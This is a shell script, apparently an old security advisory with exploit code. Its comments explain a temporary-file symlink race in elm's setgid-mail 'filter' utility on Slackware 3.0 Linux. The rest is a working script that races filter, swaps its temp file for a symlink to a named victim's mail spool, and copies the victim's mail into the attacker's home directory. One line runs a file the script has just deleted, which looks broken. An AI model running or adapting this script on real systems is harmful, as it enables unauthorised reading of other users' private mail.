#!/bin/sh
#   The elm filter under linux runs sugrp mail, thus allowing it to freely
#read and write from users mail spools.  It is only through the integrity
#of its code that the security of linux's mail system is protected; and in
#this respect it falls short.  The failure of the filter program to properly
#handle temporary files allows a user to read or write to any user's mail
#spool, a significant security hole.
#   The specific problem that is exploited in this hole is the way filter
#uses a temporary file to store the input to it, and then subsequently send
#it back out according to the filter.  Because of the modularity of the
#coding, in the main filter.c, the temporary file is opened, and then written
#to; after which it is closed.  The mailmessage function is then called, with
#the purpose of forwarding that mail, written to the temporary file, to
#whatever destination is specified in the filter.  At the start of this
#process, the temporary file is opened, and the contents of it are dumped
#to the mail spool of the user the mail is being forwarded to.
#   At any point after the file has been initially opened by the main filter
#function, since the user running filter has permissions on that temp file,
#it can be rm'd.  The temp file existing can then be replaced with a symbolic
#link to any file that group mail has read permissions on.  When it is opened
#in the mailmessage function, the symbolic link is followed and whatever file
#that was pointed to will be read in, and the contents forwarded to the user
#specified in the mail spool.
#
#   The complete exploits are shown below:
#
#                   Program: filter, an elm utility
#Affected Operating Systems: linux - Slackware 3.0, others with sgid mail filter
#              Requirements: account on machine
#       Security Compromise: user can read any mail spool readable by grp mail.
#                            (usually everything, sometimes not root)
#                    Author: Dave M. (davem@cmu.edu)
#                  Synopsis: filter writes out the mail to be forwarded to a
#                            temporary file, which is then closed and reopened;
#                            if when the temporary file is reopened it is a
#                            symlink to a mail spool, filter will proceed
#                            to forward the contents of that file as if it was
#                            the original message.
#
# This shell script exploits a problem with filter(1L)
# it will follow symbolic links, on a read allowing
# us to steal a users mail file.
#
# Usage: fread.sh victimsusername
#
# Contents will be stored in ~/victimsusername.mail
#
# Dave M. (davem@cmu.edu)
#

cp /var/spool/mail/$LOGNAME ~
cp /dev/null /var/spool/mail/$LOGNAME
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp

cat << _EOF_ >> /tmp/fread-msg.tmp
From: Dave
To: $LOGNAME
Subject: Filter Exploit

_EOF_

echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp
/tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
cp /var/spool/mail/$LOGNAME ~/$1.mail
cp ~/$LOGNAME /var/spool/mail
more ~/$1.mail